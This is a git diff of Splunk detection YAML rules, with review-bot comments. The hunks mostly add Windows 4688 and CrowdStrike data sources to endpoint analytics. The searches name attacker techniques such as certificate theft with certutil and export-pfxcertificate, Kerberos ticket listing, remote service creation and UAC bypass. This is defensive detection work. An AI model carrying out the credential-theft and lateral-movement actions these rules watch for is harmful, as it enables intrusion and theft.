search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=sc.exe
Processes.process="*kernel*" by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_service_create_remcomsvc.yml b/detections/endpoint/windows_service_create_remcomsvc.yml
index 347e982c9d..0d71be6da5 100644
--- a/detections/endpoint/windows_service_create_remcomsvc.yml
+++ b/detections/endpoint/windows_service_create_remcomsvc.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
type: Anomaly
status: production
data_source:
-- Windows System 7045
+- Windows Event Log System 7045
description: The following analytic detects the creation of the RemComSvc service
on a Windows endpoint, typically indicating lateral movement using RemCom.exe. It
leverages Windows EventCode 7045 from the System event log, specifically looking
diff --git a/detections/endpoint/windows_service_create_with_tscon.yml b/detections/endpoint/windows_service_create_with_tscon.yml
index 2c3e6c81a1..d490345a09 100644
--- a/detections/endpoint/windows_service_create_with_tscon.yml
+++ b/detections/endpoint/windows_service_create_with_tscon.yml
@@ -7,6 +7,8 @@ type: TTP
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects potential RDP Hijacking attempts by identifying
the creation of a Windows service using sc.exe with a binary path that includes
tscon.exe. This detection leverages data from Endpoint Detection and Response (EDR)
diff --git a/detections/endpoint/windows_service_creation_on_remote_endpoint.yml b/detections/endpoint/windows_service_creation_on_remote_endpoint.yml
index 642eac7e5c..7b95893fb1 100644
--- a/detections/endpoint/windows_service_creation_on_remote_endpoint.yml
+++ b/detections/endpoint/windows_service_creation_on_remote_endpoint.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the creation of a Windows Service
to further compromise and persistence within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sc.exe
OR Processes.original_file_name=sc.exe) (Processes.process=*\\\\* AND Processes.process=*create*
diff --git a/detections/endpoint/windows_service_creation_using_registry_entry.yml b/detections/endpoint/windows_service_creation_using_registry_entry.yml
index 642788bb65..3815ab0278 100644
--- a/detections/endpoint/windows_service_creation_using_registry_entry.yml
+++ b/detections/endpoint/windows_service_creation_using_registry_entry.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the modification of registry keys th
this could allow an attacker to maintain access, escalate privileges, or move laterally
within the network, leading to data theft, ransomware, or other damaging outcomes.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\SYSTEM\\CurrentControlSet\\Services*" Registry.registry_value_name
diff --git a/detections/endpoint/windows_service_deletion_in_registry.yml b/detections/endpoint/windows_service_deletion_in_registry.yml
index 0af4d50988..c7b30db767 100644
--- a/detections/endpoint/windows_service_deletion_in_registry.yml
+++ b/detections/endpoint/windows_service_deletion_in_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the deletion of a service from the W
allow attackers to maintain a lower profile within the environment, complicating
detection and remediation efforts.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SYSTEM\\CurrentControlSet\\Services*"
diff --git a/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml b/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml
index 7c59bd88a4..4eb50b66c0 100644
--- a/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml
+++ b/detections/endpoint/windows_service_initiation_on_remote_endpoint.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `sc.exe` with comma
potentially leading to further compromise and persistence within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sc.exe
OR Processes.original_file_name=sc.exe) (Processes.process=*\\\\* AND Processes.process=*start*)
diff --git a/detections/endpoint/windows_service_stop_by_deletion.yml b/detections/endpoint/windows_service_stop_by_deletion.yml
index e2d4305a69..e03a0339d1 100644
--- a/detections/endpoint/windows_service_stop_by_deletion.yml
+++ b/detections/endpoint/windows_service_stop_by_deletion.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `sc.exe` to delete a Wind
access to the compromised system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where (Processes.process_name = sc.exe OR Processes.original_file_name = sc.exe)
diff --git a/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml b/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml
index 3043128ae5..8bee80e860 100644
--- a/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml
+++ b/detections/endpoint/windows_service_stop_via_net__and_sc_application.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies attempts to stop services on a sy
or disrupt essential services, leading to potential data loss or system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name
= "sc.exe" OR Processes.original_file_name= "sc.exe" AND Processes.process="*stop*"
diff --git a/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml b/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml
index 02ac75ad3a..0b1a4bd6af 100644
--- a/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml
+++ b/detections/endpoint/windows_snake_malware_registry_modification_wav_openwithprogids.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic identifies modifications to the registry path
.wav\\OpenWithProgIds, associated with the Snake Malware campaign. It leverages
diff --git a/detections/endpoint/windows_soaphound_binary_execution.yml b/detections/endpoint/windows_soaphound_binary_execution.yml
index 072c606580..ab9a4a5e1d 100644
--- a/detections/endpoint/windows_soaphound_binary_execution.yml
+++ b/detections/endpoint/windows_soaphound_binary_execution.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of the SOAPHound binary
(`soaphound.exe`) with specific command-line arguments. It leverages data from Endpoint
Detection and Response (EDR) agents, focusing on process names, command-line arguments,
diff --git a/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml b/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml
index 9c851dbfd0..049d921724 100644
--- a/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml
+++ b/detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml
@@ -15,6 +15,8 @@ description: The following analytic detects OneNote spawning `mshta.exe`, a beha
Immediate investigation and containment are recommended.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("onenote.exe", "onenotem.exe") `process_mshta` by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_sql_spawning_certutil.yml b/detections/endpoint/windows_sql_spawning_certutil.yml
index 1dba7e5dab..0fc30cee1f 100644
--- a/detections/endpoint/windows_sql_spawning_certutil.yml
+++ b/detections/endpoint/windows_sql_spawning_certutil.yml
@@ -7,6 +7,8 @@ status: experimental
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the use of certutil to download software,
specifically when spawned by SQL-related processes. This detection leverages Endpoint
Detection and Response (EDR) data, focusing on command-line executions involving
diff --git a/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml b/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml
index 4e5c872b2d..eb383c7f53 100644
--- a/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml
+++ b/detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml
@@ -15,6 +15,8 @@ description: The following analytic detects CertUtil.exe performing a backup of
breaches.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process
IN ("*-backupdb *", "*-backup *") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml b/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml
index 40f3214de9..f6707a3b2a 100644
--- a/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml
+++ b/detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the PowerShell cmdlet 'ex
or gain unauthorized access to systems and data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process="*export-certificate*"
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml b/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml
index 34f274ba3a..a166cbf42c 100644
--- a/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml
+++ b/detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the PowerShell cmdlet `ex
breaches.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process="*export-pfxcertificate*"
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml b/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml
index 7603dbc2ad..c757ae6f36 100644
--- a/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml
+++ b/detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the Windows OS t
risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="klist.exe"
OR Processes.original_file_name = "klist.exe" Processes.parent_process_name IN ("cmd.exe",
diff --git a/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml b/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
index 87d2c4fbed..b3159bdd92 100644
--- a/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
+++ b/detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the decompile parameter w
compromise and persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*-decompile*
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml b/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml
index d947e3ab84..b121af2adf 100644
--- a/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml
+++ b/detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of nslookup.exe to que
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "nslookup.exe"
OR Processes.original_file_name = "nslookup.exe") AND Processes.process = "*_ldap._tcp.dc._msdcs*"
diff --git a/detections/endpoint/windows_system_discovery_using_qwinsta.yml b/detections/endpoint/windows_system_discovery_using_qwinsta.yml
index 384ab9d953..cad6db4e70 100644
--- a/detections/endpoint/windows_system_discovery_using_qwinsta.yml
+++ b/detections/endpoint/windows_system_discovery_using_qwinsta.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of "qwinsta.exe" on a
and further compromise of the host.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "qwinsta.exe"
OR Processes.original_file_name = "qwinsta.exe" by Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/windows_system_logoff_commandline.yml b/detections/endpoint/windows_system_logoff_commandline.yml
index feb74b6866..47df27c902 100644
--- a/detections/endpoint/windows_system_logoff_commandline.yml
+++ b/detections/endpoint/windows_system_logoff_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows command
efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where (Processes.process_name = shutdown.exe OR Processes.original_file_name = shutdown.exe)
diff --git a/detections/endpoint/windows_system_network_config_discovery_display_dns.yml b/detections/endpoint/windows_system_network_config_discovery_display_dns.yml
index 9a66d7d083..819e644fb7 100644
--- a/detections/endpoint/windows_system_network_config_discovery_display_dns.yml
+++ b/detections/endpoint/windows_system_network_config_discovery_display_dns.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the "ipconfig /d
network-based attacks or lateral movement.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="ipconfig.exe"
OR Processes.original_file_name = "ipconfig.exe" AND Processes.process = "*/displaydns*"
diff --git a/detections/endpoint/windows_system_network_connections_discovery_netsh.yml b/detections/endpoint/windows_system_network_connections_discovery_netsh.yml
index 83a2f34969..30bb8b9341 100644
--- a/detections/endpoint/windows_system_network_connections_discovery_netsh.yml
+++ b/detections/endpoint/windows_system_network_connections_discovery_netsh.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows built-i
access or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_netsh`AND Processes.process
= "* show *" Processes.process IN ("*state*", "*config*", "*wlan*", "*profile*")
diff --git a/detections/endpoint/windows_system_reboot_commandline.yml b/detections/endpoint/windows_system_reboot_commandline.yml
index 7960407df0..8fc6f31501 100644
--- a/detections/endpoint/windows_system_reboot_commandline.yml
+++ b/detections/endpoint/windows_system_reboot_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the Windows comm
downtime, data loss, or hindered incident response efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where (Processes.process_name = shutdown.exe OR Processes.original_file_name = shutdown.exe)
diff --git a/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml b/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml
index f3720020ef..125d4594ea 100644
--- a/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml
+++ b/detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of Syncappvpublishings
a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("wscript.exe","cscript.exe")
Processes.process="*syncappvpublishingserver.vbs*" by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_system_shutdown_commandline.yml b/detections/endpoint/windows_system_shutdown_commandline.yml
index 2aa6d6ec78..e08094384d 100644
--- a/detections/endpoint/windows_system_shutdown_commandline.yml
+++ b/detections/endpoint/windows_system_shutdown_commandline.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of the Windows shut
or evasion of security tools, impacting the overall security posture of the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where (Processes.process_name = shutdown.exe OR Processes.original_file_name = shutdown.exe)
diff --git a/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml b/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml
index c013297983..8112d779b7 100644
--- a/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml
+++ b/detections/endpoint/windows_system_time_discovery_w32tm_delay.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of the w32tm.exe utility
undetected.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name = w32tm.exe Processes.process= "* /stripchart *" Processes.process=
diff --git a/detections/endpoint/windows_system_user_discovery_via_quser.yml b/detections/endpoint/windows_system_user_discovery_via_quser.yml
index 6d2a13035e..6615b6fd5c 100644
--- a/detections/endpoint/windows_system_user_discovery_via_quser.yml
+++ b/detections/endpoint/windows_system_user_discovery_via_quser.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows OS tool
privileges.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="quser.exe"
OR Processes.original_file_name = "quser.exe" by Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/windows_system_user_privilege_discovery.yml b/detections/endpoint/windows_system_user_privilege_discovery.yml
index 99dd2dfba5..7133161692 100644
--- a/detections/endpoint/windows_system_user_privilege_discovery.yml
+++ b/detections/endpoint/windows_system_user_privilege_discovery.yml
@@ -7,6 +7,8 @@ status: production
type: Hunting
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of `whoami.exe` with the
`/priv` parameter, which displays the privileges assigned to the current user account.
It leverages data from Endpoint Detection and Response (EDR) agents, focusing on
diff --git a/detections/endpoint/windows_time_based_evasion.yml b/detections/endpoint/windows_time_based_evasion.yml
index 66c6773554..652ad00ac9 100644
--- a/detections/endpoint/windows_time_based_evasion.yml
+++ b/detections/endpoint/windows_time_based_evasion.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects potentially malicious processes that initiate
a ping delay using an invalid IP address. It leverages data from Endpoint Detection
and Response (EDR) agents, focusing on command-line executions involving "ping 0
diff --git a/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml b/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml
index 4b780c85e4..824ee4ec3e 100644
--- a/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml
+++ b/detections/endpoint/windows_time_based_evasion_via_choice_exec.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the use of choice.exe in batch files as
a delay tactic, a technique observed in SnakeKeylogger malware. It leverages data
from Endpoint Detection and Response (EDR) agents, focusing on process names and
diff --git a/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml b/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml
index bdc5625734..043391f020 100644
--- a/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml
+++ b/detections/endpoint/windows_uac_bypass_suspicious_child_process.yml
@@ -8,13 +8,15 @@ type: TTP
description: The following analytic detects when an executable known for User Account
Control (UAC) bypass exploitation spawns a child process in a user-controlled location
or a command shell executable (e.g., cmd.exe, powershell.exe). This detection leverages
- Sysmon Event ID 1 data, focusing on high or system integrity level processes with
+ Sysmon EventID 1 data, focusing on high or system integrity level processes with
specific parent-child process relationships. This activity is significant as it
may indicate an attacker has successfully used a UAC bypass exploit to escalate
privileges. If confirmed malicious, this could allow the attacker to execute arbitrary
commands with elevated privileges, potentially compromising the entire system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_integrity_level
IN ("high","system") AND Processes.parent_process_name IN (`uacbypass_process_name`)
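Review bot: The search at the end of the hunk filters on `Processes.process_integrity_level`, and it is not visible here whether the newly listed Security 4688 and CrowdStrike ProcessRollup2 feeds populate that field in Endpoint.Processes the way Sysmon EventID 1 does; if they do not, the added data_source entries overstate coverage and should be confirmed before merging. The description line changed in the same hunk still says `This detection leverages Sysmon EventID 1 data`, which now contradicts the data_source list; either widen it, e.g. `This detection leverages Sysmon EventID 1 (or equivalent EDR process-creation) data`, or keep data_source at Sysmon only. The same applies to the next hunk (windows_uac_bypass_suspicious_escalation_behavior.yml). The search continues outside the hunk.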
diff --git a/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml b/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml
index 7f18816f7f..e52844bd6f 100644
--- a/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml
+++ b/detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml
@@ -8,13 +8,15 @@ type: TTP
description: The following analytic detects when a process spawns an executable known
for User Account Control (UAC) bypass exploitation and subsequently monitors for
any child processes with a higher integrity level than the original process. This
- detection leverages Sysmon Event ID 1 data, focusing on process integrity levels
+ detection leverages Sysmon EventID 1 data, focusing on process integrity levels
and known UAC bypass executables. This activity is significant as it may indicate
an attacker has successfully used a UAC bypass exploit to escalate privileges. If
confirmed malicious, the attacker could gain elevated privileges, potentially leading
to further system compromise and persistent access.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count max(_time) as lastTime from
datamodel=Endpoint.Processes where Processes.process_integrity_level IN ("low","medium")
by Processes.dest, Processes.user, Processes.process_name, Processes.process, Processes.process_guid,
diff --git a/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml b/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml
index 67361645f1..1265f51ed7 100644
--- a/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml
+++ b/detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml
@@ -4,7 +4,7 @@ version: 1
date: '2024-06-07'
author: Teoderick Contreras, Splunk
data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
type: TTP
status: production
description: This detection identifies unsigned DLLs loaded through DLL side-loading with same file path with the process loaded the DLL, a technique observed in DarkGate malware.
diff --git a/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml b/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml
index 5ac3b46ab7..3145bf094b 100644
--- a/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml
+++ b/detections/endpoint/windows_unsigned_ms_dll_side_loading.yml
@@ -4,7 +4,7 @@ version: 2
date: '2024-05-27'
author: Teoderick Contreras, Splunk
data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
type: Anomaly
status: production
description: The following analytic identifies potential DLL side-loading instances
diff --git a/detections/endpoint/windows_valid_account_with_never_expires_password.yml b/detections/endpoint/windows_valid_account_with_never_expires_password.yml
index 8e84d9e45c..bbd1bc14bf 100644
--- a/detections/endpoint/windows_valid_account_with_never_expires_password.yml
+++ b/detections/endpoint/windows_valid_account_with_never_expires_password.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of net.exe to update user ac
access to sensitive information.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_net` AND Processes.process="* accounts *" AND Processes.process="*
diff --git a/detections/endpoint/windows_vulnerable_3cx_software.yml b/detections/endpoint/windows_vulnerable_3cx_software.yml
index 7dccbaa56b..92b8990d68 100644
--- a/detections/endpoint/windows_vulnerable_3cx_software.yml
+++ b/detections/endpoint/windows_vulnerable_3cx_software.yml
@@ -7,6 +7,8 @@ type: TTP
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects instances of the 3CXDesktopApp.exe with
a FileVersion of 18.12.x, leveraging Sysmon logs. This detection focuses on identifying
vulnerable versions 18.12.407 and 18.12.416 of the 3CX desktop app. Monitoring this
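Review bot: The description still reads `a FileVersion of 18.12.x, leveraging Sysmon logs` while data_source now also names Windows Event Log Security 4688 and CrowdStrike ProcessRollup2; whether those sources expose the binary's file version to the search cannot be seen here and should be confirmed, since a source that lacks the field adds nothing but metadata. Once confirmed, align the wording with whichever sources actually work, e.g. `leveraging process-creation telemetry that includes the file version`. The search body is outside the hunk.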
diff --git a/detections/endpoint/windows_windbg_spawning_autoit3.yml b/detections/endpoint/windows_windbg_spawning_autoit3.yml
index d9fca3e811..c8bbd6fdf2 100644
--- a/detections/endpoint/windows_windbg_spawning_autoit3.yml
+++ b/detections/endpoint/windows_windbg_spawning_autoit3.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies instances of the WinDBG process spawning
AutoIt3. This behavior is detected by monitoring endpoint telemetry for processes
where 'windbg.exe' is the parent process and 'autoit3.exe' or similar is the child
diff --git a/detections/endpoint/windows_winlogon_with_public_network_connection.yml b/detections/endpoint/windows_winlogon_with_public_network_connection.yml
index 4917a62735..2f9a4cf7c8 100644
--- a/detections/endpoint/windows_winlogon_with_public_network_connection.yml
+++ b/detections/endpoint/windows_winlogon_with_public_network_connection.yml
@@ -6,8 +6,7 @@ author: Michael Haag, Splunk
status: experimental
type: Hunting
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 3
+- Sysmon EventID 1 AND Sysmon EventID 3
description: 'The following analytic detects instances of Winlogon.exe, a critical
Windows process, connecting to public IP addresses. This behavior is identified
using Endpoint Detection and Response (EDR) telemetry, focusing on network connections
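Review bot: The replacement entry `- Sysmon EventID 1 AND Sysmon EventID 3` collapses two data-source references into one composite name; if contentctl resolves data_source values against the definitions under data_sources/, a definition with exactly that name has to exist or the build will reject the file (inferred from the repository's pipeline, not visible in this hunk). wsreset_uac_bypass uses the same composite form but spreads it over two entries (`Sysmon EventID 1 AND Sysmon EventID 12` and `Sysmon EventID 1 AND Sysmon EventID 13`), so the convention for detections that need several event types should be settled and applied identically in both files. If the aim is only to record that both event IDs are required, keeping the separate entries and stating the dependency in the description is the lower-risk option.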
diff --git a/detections/endpoint/windows_wmi_process_and_service_list.yml b/detections/endpoint/windows_wmi_process_and_service_list.yml
index c9499e2dfb..66318b4a45 100644
--- a/detections/endpoint/windows_wmi_process_and_service_list.yml
+++ b/detections/endpoint/windows_wmi_process_and_service_list.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies suspicious WMI command lines quer
the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
IN ("*process list*", "*service list*") by Processes.process_name Processes.original_file_name
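Review bot: Windows Event Log Security 4688 carries the process command line only when the audit policy "Include command line in process creation events" is enabled, and this search filters on `Processes.process IN ("*process list*", "*service list*")`, so listing 4688 as a data source overstates coverage on hosts where that policy is off. The same caveat applies to the other hunks in this batch whose searches match on Processes.process: windows_wmi_process_call_create, winhlp32_spawning_a_process, wmic_group_discovery, wmic_noninteractive_app_uninstallation, wmic_xsl_execution_via_url and xsl_script_execution_with_wmic. A sentence in each detection's how_to_implement field (assuming this repository uses that field) such as `Windows Security 4688 satisfies this search only when command-line auditing is enabled on the endpoint.` would make the dependency explicit. The search field continues beyond the hunk.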
